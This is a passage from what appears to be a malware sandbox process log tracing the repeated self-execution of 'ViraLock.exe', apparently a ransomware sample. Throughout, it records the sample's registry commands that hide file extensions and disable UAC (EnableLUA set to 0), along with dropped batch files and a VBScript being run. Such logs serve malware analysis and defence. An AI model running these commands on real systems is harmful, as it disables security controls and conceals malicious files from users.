        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        132⤵
        
        PID:5544
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        133⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        134⤵
        
        PID:4084
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        135⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        136⤵
        
        PID:5192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        137⤵
        
        PID:6072
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        137⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        138⤵
        
        PID:5588
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        139⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        140⤵
        System Location Discovery: System Language Discovery
        
        PID:6016
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        141⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        142⤵
        
        PID:5128
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        143⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        144⤵
        
        PID:5792
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        145⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        146⤵
        
        PID:4952
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        147⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        148⤵
        
        PID:6052
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        149⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        150⤵
        
        PID:3036
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        151⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        152⤵
        
        PID:5412
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        153⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        154⤵
        System Location Discovery: System Language Discovery
        
        PID:3568
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        155⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        156⤵
        
        PID:1092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        
        PID:5280
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        157⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        158⤵
        
        PID:5292
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        159⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        160⤵
        
        PID:308
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:5948
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        161⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        162⤵
        
        PID:5432
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        163⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        164⤵
        
        PID:3124
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        165⤵
        
        PID:5428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        164⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        164⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        162⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        162⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        162⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hoIUYwIU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        162⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        163⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        160⤵
        Modifies visibility of file extensions in Explorer
        
        PID:384
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        160⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        160⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWMIYIIQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        160⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        161⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        158⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        158⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        158⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cqEYUgoI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        158⤵
        System Location Discovery: System Language Discovery
        
        PID:5236
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        159⤵
        
        PID:5656
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        156⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        156⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        156⤵
        Modifies registry key
        
        PID:5256
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qAossoQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        156⤵
        
        PID:5800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        157⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        154⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        154⤵
        System Location Discovery: System Language Discovery
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        154⤵
        UAC bypass
        
        PID:6076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aaYAYcsk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        154⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        155⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        152⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        152⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        152⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RcIYsoUU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        152⤵
        System Location Discovery: System Language Discovery
        
        PID:5740
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        153⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        150⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        150⤵
        
        PID:3828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        151⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        150⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RcUUcMsk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        150⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        151⤵
        
        PID:404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        148⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        148⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        148⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fMgQAIgM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        148⤵
        
        PID:5416
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        149⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        149⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        146⤵
        
        PID:796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        146⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        146⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kMkUEogU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        146⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        147⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        144⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        144⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        144⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WgYgAgIw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        144⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        145⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        142⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        142⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        142⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RKEIsMEI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        142⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        143⤵
        
        PID:488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        140⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        140⤵
        
        PID:5176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        141⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        140⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dcEQQwsY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        140⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        141⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        138⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        138⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        138⤵
        UAC bypass
        
        PID:5248
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TGUkoIII.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        138⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        139⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        136⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        136⤵
        System Location Discovery: System Language Discovery
        
        PID:5816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        136⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VIgYQwYk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        136⤵
        System Location Discovery: System Language Discovery
        
        PID:3964
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        137⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        134⤵
        Modifies registry key
        
        PID:1900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        134⤵
        Modifies registry key
        
        PID:5144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        134⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KSUcUMQM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        134⤵
        
        PID:3372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        135⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        135⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:5980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        133⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        
        PID:644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kiUAkQss.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        132⤵
        
        PID:5616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        133⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        133⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        Modifies visibility of file extensions in Explorer
        
        PID:132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KgYkkgkw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        130⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        
        PID:488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        UAC bypass
        
        PID:5752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gosYwgkY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        128⤵
        
        PID:292
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        
        PID:5812
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        127⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vYAcgcQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        126⤵
        
        PID:5948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        127⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zQoMkgQM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        124⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        System Location Discovery: System Language Discovery
        
        PID:5348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        Modifies registry key
        
        PID:632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        
        PID:5908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        123⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XIEoEQwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        122⤵
        
        PID:6028
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        123⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        UAC bypass
        
        PID:5880
        
        C:\Windows\SysWOW64\cmd.exe
        
